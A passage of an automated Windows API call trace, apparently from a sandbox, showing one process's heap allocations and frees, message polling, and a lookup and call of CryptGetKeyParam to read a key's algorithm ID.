(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1f0 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0078.515] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0078.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0078.515] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0078.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.515] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2530 [0078.515] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2560 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0078.516] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0078.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0078.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa90 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26a0 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26c0 [0078.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26c0 | out: hHeap=0x1780000) returned 1 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca640 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0078.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0078.516] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.516] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0078.516] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797088 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.517] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0078.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0078.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0078.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0078.517] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0078.517] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.518] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0078.518] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0078.518] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0078.518] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0078.518] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0078.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca580 [0078.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0078.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0078.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0078.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0078.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0078.519] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.519] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797108 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2788 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca568 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797128 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0078.520] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca598 | out: hHeap=0x1780000) returned 1 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01e8 | out: hHeap=0x1780000) returned 1 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.520] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa18 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0078.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0078.521] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x1796de8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8f8 | out: hHeap=0x1780000) returned 1 [0078.521] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0078.522] GetProcAddress (hModule=0x756e0000, lpProcName="CryptGetKeyParam") returned 0x75712db0 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfef0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2850 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0078.522] CryptGetKeyParam (in: hKey=0x41ac180, dwParam=0x7, pbData=0x43e2600, pdwDataLen=0x144e260, dwFlags=0x0 | out: pbData=0x43e2600*=0x6610, pdwDataLen=0x144e260*=0x4) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0078.522] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0008 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5e0 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0078.523] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca748 | out: hHeap=0x1780000) returned 1 